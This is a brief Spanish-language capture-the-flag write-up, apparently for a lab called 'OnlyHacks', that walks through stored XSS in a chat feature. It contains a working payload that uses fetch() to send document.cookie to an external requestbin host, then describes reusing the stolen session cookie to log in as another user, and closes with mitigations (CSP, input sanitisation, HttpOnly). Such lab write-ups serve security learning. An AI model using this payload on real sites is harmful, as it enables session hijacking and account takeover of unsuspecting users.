OnlyHacks (XSS)

- Cross-Site Scripting (XSS) -

---

• Creamos un usuario nuevo:

• Al entrar hablamos con una joven para ver que dice:

• Miramos si es vulnerable al XSS .

<script>alert("Hola, mundo!");</script>

• Existe un servidor en internet gratis para hacer este tipo de pruebas:

https://requestbin.whapi.cloud/1benktc1?inspectrequestbin.whapi.cloud

• Nuestro comando:

<script>fetch("http://requestbin.whapi.cloud/1benktc1?cookie=" + document.cookie );</script>

• Recuperamos la Cookie de sesión para entrar como en usuario:

• En la página podemos ver la cookie para copiar y pegar en Apliction, por ultimo recargamos la página.

es un ataque de Cross-Site Scripting (XSS) diseñado para robar cookies de sesión y enviarlas a un servidor externo.

¿Por qué es peligroso?

• Exfiltración de datos: Si un usuario carga una página vulnerable y este script se ejecuta, sus cookies se enviarán a la URL especificada.

• Secuestro de sesiones: Si la cookie contiene credenciales de sesión, un atacante podría usarlas para acceder a la cuenta del usuario.

¿Cómo prevenirlo?

1. Implementar Content Security Policy (CSP) para evitar la ejecución de scripts no autorizados.

2. Escapar y sanitizar entradas de usuario para prevenir la inyección de scripts.

3. Usar HttpOnly en las cookies para evitar que JavaScript acceda a ellas.

---